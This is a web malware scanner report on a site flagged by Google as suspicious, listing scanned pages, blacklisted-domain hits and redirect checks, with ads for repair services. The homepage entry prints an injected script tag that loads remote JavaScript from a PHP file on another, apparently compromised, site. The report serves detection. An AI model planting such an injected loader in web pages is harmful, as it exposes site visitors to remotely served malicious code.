New scan:

Malware Scanner report for armv1975.tempdomainname.com

Malicious/Suspicious/Total urls checked
0/8/8
8 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "armv1975.tempdomainname.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=armv1975.tempdomainname.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://armv1975.tempdomainname.com/
200 OK
Content-Length: 2509
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://patrick-todd.com/wp-admin/fmhxncr4.php?id=83158764"></script>

https://armv1975.tempdomainname.com/ControlPanel/
200 OK
Content-Length: 4735
Content-Type: text/html
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title></title><link id="cpcss" rel="stylesheet" type="text/css" href="/ControlPanel/css/default.css"></link><script type="text/javascript" language="Javascript" sr
...[5315 bytes skipped]...

https://armv1975.tempdomainname.com/ControlPanel/js/prototype.1.5.1.js
200 OK
Content-Length: 96572
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype web site: http://www.prototypejs.org/
*
/*--------------------------------------------------------------------------*/
var Prototype = {
Version: '1.5.1.1',
Browser: {
IE: !!(window.attachEvent &&am
...[107889 bytes skipped]...

https://armv1975.tempdomainname.com/ControlPanel/js/dhtmlHistory.js
200 OK
Content-Length: 15732
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

/**
* dhtmlHistory - An object that provides DHTML history, history data, and
* bookmarking for AJAX applications.
*
* $Horde: dimp/js/src/dhtmlHistory.js,v 1.17 2007/06/20 16:08:42 slusarz Exp $
*
* Original code Copyright 2005, Brad Neuberg, bkn3@columbia.edu
* http://codinginparadise.org
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated
...[16701 bytes skipped]...

https://armv1975.tempdomainname.com/ControlPanel/js/ui-validation.js
200 OK
Content-Length: 20272
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

/* ---------------------------------------------------------------
ui-validation routines.
Purpose: Provide consistent form validation routines for use
across all form dialogs in the Control Panel.
Params:
ele_id (required ele or ele id)
The ID of the form element to validate
required (optional string)
The name of the branding string or the message to display
to the
...[22624 bytes skipped]...

https://armv1975.tempdomainname.com/ControlPanel/js/ui-form-inputs.js
200 OK
Content-Length: 61101
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

isValidKey: function(key) {
return (typeof key === "string");
},

/*Public - CSS strings utilized by both objects to hide or show behind-the-scenes DOM elements*/
showStyles: 'border:0;margin:0;padding:0;',
hideStyles: 'left:-1000px;top:-1000px;width:1px;height:1px;border:0;position:absolute;',

/*Public - debug mode flag*/
debugMode: false,

/*- - - - - - - - - - - -*/
/*Private: Our hash of
...[39444 bytes skipped]...

https://armv1975.tempdomainname.com/ControlPanel/js/cookies.js
200 OK
Content-Length: 867
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

var Cookie = {
set: function(name, value, daysToExpire)
{
var expire = '';
if (daysToExpire != undefined) {
var d = new Date();
d.setTime(d.getTime() + (86400000 * parseFloat(daysToExpire)));
expire = '; expires=' + d.toGMTString();
}
return (document.cookie = escape(name) + '=' + escape(value || '') + expire);
},
get: function(name)
{
var cookie = docu
...[529 bytes skipped]...

http://armv1975.tempdomainname.com/test404page.js
404 Not Found
Content-Length: 281
Content-Type: text/html
suspicious
Page code contains blacklisted domain: ahmedrasheed.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /test404page.js was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.42 Server at ahmedrasheed.com Port 80</ADDRESS>
</BODY></HTML>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: armv1975.tempdomainname.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Jun 2014 10:12:07 GMT
Accept-Ranges: bytes
ETag: "d83ec8-9cd-5378163b"
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Length: 2509
Content-Type: text/html
Last-Modified: Sun, 18 May 2014 02:08:59 GMT

...2509 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: armv1975.tempdomainname.com
Referer: http://www.google.com/search?q=armv1975.tempdomainname.com

Result:
The result is similar to the first query. There are no suspicious redirects found.